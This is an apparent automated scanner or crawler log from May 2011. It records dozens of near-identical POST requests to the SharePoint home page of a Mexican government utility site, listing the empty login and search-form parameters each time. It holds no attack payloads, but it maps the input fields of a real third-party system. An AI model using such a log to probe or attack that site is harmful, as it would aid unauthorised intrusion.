ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="1", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="1", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="1", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="32", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="32", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="32", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="32", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="32", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="32", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="1", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="1", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="1", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="1", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
